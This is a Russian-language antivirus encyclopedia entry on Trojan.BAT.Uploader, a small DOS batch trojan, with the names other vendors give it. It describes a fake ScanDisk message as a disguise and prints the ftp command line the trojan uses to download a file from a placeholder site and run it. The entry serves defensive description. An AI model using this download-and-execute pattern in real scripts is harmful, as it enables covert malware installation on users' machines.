Trojan.BAT. Uploader

Троянская программа. Является пакетным файлом DOS.

Размер троянца — около 400 байт.

Деструктивная активность

При запуске троянской программы появляется окно консоли с сообщением:

MS-DOS SCANDISK
found 27,4951 lost bytes
fixing error(s)...
lost cluster(s) fixed

Троянец создает файл с именем C:\$.tmp, который содержит сценарий работы для утилиты FTP, после чего запускает эту утилиту с параметрами:

ftp -v -i -n -s:c:\$.tmp <адрес_сайта для загрузки файла> c:\$$.tmp

После этого в папку %WinDir% скачивается файл, имя которого указано в сценарии работы и запускается. После этого троян удаляет файлы:

C:\$.tmp
c:\$$.tmp

И завершает свою работу.

Другие названия

Trojan.BAT.Uploader («Лаборатория Касперского») также известен как: Uploader (McAfee), Trojan Horse (Symantec), Troj/Uploader (Sophos), Trojan:Uploader (RAV), BAT_UPLOADER.A (Trend Micro), TR/Bat.Uploader (H+BEDV), Win:TrivTroj-B (ALWIL), BAT.Trojan.Uploader.A (SOFTWIN), Trojan.Bat.Uploader (ClamAV), Trj/SD-Rux (Panda), BAT/Uploader (Eset)